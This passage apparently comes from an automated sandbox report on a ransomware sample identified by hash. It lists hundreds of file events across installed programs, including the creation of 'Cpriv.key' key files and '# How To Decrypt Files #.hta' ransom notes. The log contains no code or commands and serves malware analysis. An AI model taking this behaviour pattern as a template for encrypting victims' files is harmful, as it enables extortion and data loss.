Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_preferencestyle.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10265_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Certificates\Verisign\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090777.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Couture.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MSCOL11.PPD de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\PLUS.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\slideshow_glass_frame.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\pagecurl.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\10.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01361_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\LATIN1.SHP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHigh.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\ECHO\ECHO.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CHECKBOX.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.CMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576_91n92.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0250504.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\COMPASS\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\SLATE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199473.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00623_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198226.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\settings.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\BORDERS\MSART3.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21375_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\24.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\EXPEDITN\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0195534.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sendopts.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03464_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02740G.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14871_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\JOURNAL\JOURNAL.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_hover.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0294989.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00367_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00247_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00168_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsColorChart.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\OrielMergeFax.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\reader\filename.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\corner.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\amd64\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterBold.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\SAVE.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-over-DOT.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15020_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\CONFLICT.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\INVITE.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\47.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK.DEV.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_thunderstorm.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_m.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\PIXEL\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\RIPPLE\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_s.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ar.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_extractor\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SPRING\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02155_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00516L.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\APIFile_8.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\pl.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\clock.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\ParentMenuButtonIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Synchronization Services\ADO.NET\v1.0 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\34.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\1047x576_91n92.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01474_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01304G.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_mid_over.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\PublicFunctions.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\VBA\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB2B.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\timer_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198377.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Horizon.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Internet Explorer\SIGNUP\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15019_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR39F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\RADIAL\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PROOF\MSGR3ES.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\browser\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14656_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Library\Analysis\ANALYS32.XLL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office32.WW de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\OCEAN_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\epl-v10.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00820_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\LightBlueRectangle.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\softedges.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21413_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\TYPE.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\EVRGREEN\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\SecretST.TTF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Certificates\groove.net\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\INFOPATH_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00135_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02126_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02201_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18198_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\INFOPATHEDITOR_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD07831_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\ONENOTE_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\drag.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.EPS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143744.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\UrbanLetter.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft 